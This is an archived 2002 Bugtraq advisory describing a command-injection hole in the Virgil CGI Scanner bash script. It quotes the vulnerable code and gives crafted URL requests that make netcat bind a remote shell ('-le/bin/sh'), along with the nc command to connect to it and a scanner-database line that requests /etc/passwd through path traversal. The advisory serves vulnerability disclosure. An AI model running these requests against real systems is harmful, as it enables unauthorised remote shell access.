Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: General :: virgil.txt

Virgil CGI Scanner Vulnerability




Return-Path: <bugtraq-return-6969-dethmeow=pcnet.ca@securityfocus.com>
Received: from outgoing.securityfocus.com (outgoing2.securityfocus.com [205.206.231.26])
	by buffy.pacificcoast.net (8.11.0/8.11.0) with ESMTP id g9MKE1u26604
	for <dethmeow@pcnet.ca>; Tue, 22 Oct 2002 13:14:01 -0700
Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
	by outgoing.securityfocus.com (Postfix) with QMQP
	id 6C0C58F2C5; Tue, 22 Oct 2002 13:04:56 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11348 invoked from network); 22 Oct 2002 18:27:53 -0000
Message-Id: <200210221854.g9MIsEIu056660@mailserver2.hushmail.com>
Date: Tue, 22 Oct 2002 11:54:12 -0700
To: bugtraq@securityfocus.com
Subject: Virgil CGI Scanner Vulnerability
From: kalif@hushmail.com
X-Spam-Status: No, hits=-1.0 required=5.0 tests=NO_REAL_NAME,LINES_OF_YELLING,PGP_SIGNATURE version=2.20
X-Spam-Level: 


-----BEGIN PGP SIGNED MESSAGE-----

- - --------------------------------------------------------------------------
KALIF research group                                    kalif@hushmail.com
October 21st, 2002                                         Joschka Fischer
- - --------------------------------------------------------------------------

- - Overview

  Software      : Virgil CGI Scanner 0.9
  Programmer    : Marc Ruef <marc.ruef@computec.ch>
  Vulnerability : Privilege Escalation
  Status        : Author has been notified
  Type          : remote

- - Issue

   Joschka Fischer discovered a security hole in the CGI vulnerability scanner
  'Virgil' by Mark Ruef [1] ! By sending a special crafted request one is able
  to spawn a remote shell with the privileges of the running CGI script.

    Depending on the used software this is either the owner of the script (suExec)
  or the user under which the HTTP daemon is executed (usually nobody).

- - Problem Description

   Virgil CGI Scanner by Mark Ruef is a simple Bash Script which offers an
  interface to start CGI security audits against foreign hosts. The author states
  that his software represents the first free online-based CGI scanner and uses a
  very effective and fast technique to determine vulnerabilities.

   Mark Ruef - a self-proclaimed security expert - recently received fame by posting
  different announcements to well-known security mailinglists and by writing a
  german book called "Hacking Intern" which deals with common security techniques and
  has been released by a german gossip publisher house [2].

  To get the Virgil CGI Scanner look at:
   http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz
   MD5SUM: fe098b68c0de04cb0200f2db324ab10b

  For a running version visit:
   http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi

- - Technical Description

  The following vulnerability is present in Virgil CGI Scanner v. 0.9!

   BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`

  Here, both variables are user-supplied:

   TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed s/"tar="//`
   ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed s/"zielport="// |sed "s/-//g"`

  Nevertheless there exist a few restrictions, namly:
   - The $QUERY_STRING was not parsed, i.e. %20 for example was not replaced with ' '
   - In $ZIELPORT the dash ('-') is filtered out

  To test whether the script is vulnerable use the following request and telnet to
  the given port number (i.e. 31337):

   /cgi-bin/virgil.cgi?tar=-lp&zielport=31337

  Exploitation is very straight forwared as long as nc supports the -e command:

   '/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port for
  exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v TARGET.COM 1030-6000`
  while constantly requesting the URI mentioned above.

- - Workaround / Patch

   We are currently not aware of any patches, but we suggest you to update your Virgil
  Vulnerable CGI-Script Database accordingly.

  *** apache.db.old	Sun Oct 23 23:05:05 1983
  --- apache.db   	Sun Oct 23 23:05:05 1985
  ***************
  *** 1,3 ****
  --- 1,5 ----
  + cgi-bin/virgil.cgi?tar=-lp&zielport=31337
  + cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
    cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd

- - References / Greets

  [1] http://www.computec.ch
  [2] http://www.amazon.de/exec/obidos/ASIN/381582284X

  Pengo for elite VMS security
  Nung at the CCC-Congress, next time i will ask for coffee.



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wloEARECABoFAj21nuYTHGthbGlmQGh1c2htYWlsLmNvbQAKCRBfQx1m9p9BTXGvAJwL
bceg643rTUH1HXtJFbvmNqAd7gCgsKHGY9J6tFCj/DeB7RYEmrix0q8=
=nBCM
-----END PGP SIGNATURE-----




Get your free encrypted email at https://www.hushmail.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH